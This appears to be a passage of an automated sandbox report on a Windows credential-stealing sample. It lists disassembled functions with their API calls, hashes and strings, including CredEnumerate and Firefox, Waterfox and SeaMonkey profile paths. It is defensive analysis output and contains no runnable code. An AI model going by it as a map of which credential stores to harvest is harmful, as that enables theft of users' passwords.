                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3191383707-0
                                                                                                                                                                                                                          • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                                                                                                          • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403CBF
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403CD4
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403CE9
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403CFE
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403D13
                                                                                                                                                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403DDA
                                                                                                                                                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                                                                                                                          • String ID: Waterfox$Waterfox\Profiles
                                                                                                                                                                                                                          • API String ID: 3527940856-11920434
                                                                                                                                                                                                                          • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                                                                                          • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403E50
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403E65
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403E7A
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403E8F
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403EA4
                                                                                                                                                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403F6B
                                                                                                                                                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                                                                                                                          • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                                                                                                                          • API String ID: 3527940856-2068335096
                                                                                                                                                                                                                          • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                                                                                          • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403FE1
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403FF6
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040400B
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00404020
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00404035
                                                                                                                                                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004040FC
                                                                                                                                                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                                                                                                                          • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                                                                                                                          • API String ID: 3527940856-3369679110
                                                                                                                                                                                                                          • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                                                                                                          • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                                                          • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                                                                                                                          • API String ID: 3510742995-2641926074
                                                                                                                                                                                                                          • Opcode ID: ce3f0164aafa0249c1655987c9fd68d1cb4a7ac41c6f811fdb80cf943b1bed77
                                                                                                                                                                                                                          • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce3f0164aafa0249c1655987c9fd68d1cb4a7ac41c6f811fdb80cf943b1bed77
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                                                                                                                                                                            • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                                                                                                                            • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004033B7
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 004033D0
                                                                                                                                                                                                                          • wcscmp.MSVCRT ref: 004033FC
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                                                                                                                                                                                                                          • String ID: $0.@
                                                                                                                                                                                                                          • API String ID: 3030842498-1896041820
                                                                                                                                                                                                                          • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                                                                                          • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2941347001-0
                                                                                                                                                                                                                          • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                                                                                                                                                          • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403C09
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                                                            • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                                                                                                                            • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memsetwcscat$Closewcscpywcslen
                                                                                                                                                                                                                          • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                                                                                                          • API String ID: 3249829328-1174173950
                                                                                                                                                                                                                          • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                                                                                          • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                          • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 669240632-0
                                                                                                                                                                                                                          • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                                                                                          • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 00414458
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                                                                                                                          • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                                                                                          • String ID: "%s"
                                                                                                                                                                                                                          • API String ID: 1343145685-3297466227
                                                                                                                                                                                                                          • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                                                                                          • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                                                                                                                                          • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                                                                                                                          • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                                                                                          • API String ID: 1714573020-3385500049
                                                                                                                                                                                                                          • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                                                                          • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004087D6
                                                                                                                                                                                                                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                                            • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00408828
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00408840
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00408858
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00408870
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00408888
                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2911713577-0
                                                                                                                                                                                                                          • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                                                                                          • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcmp
                                                                                                                                                                                                                          • String ID: @ $SQLite format 3
                                                                                                                                                                                                                          • API String ID: 1475443563-3708268960
                                                                                                                                                                                                                          • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                                                                                          • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                            • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressCloseProcVersionmemsetwcscpy
                                                                                                                                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                                                          • API String ID: 2705122986-2036018995
                                                                                                                                                                                                                          • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
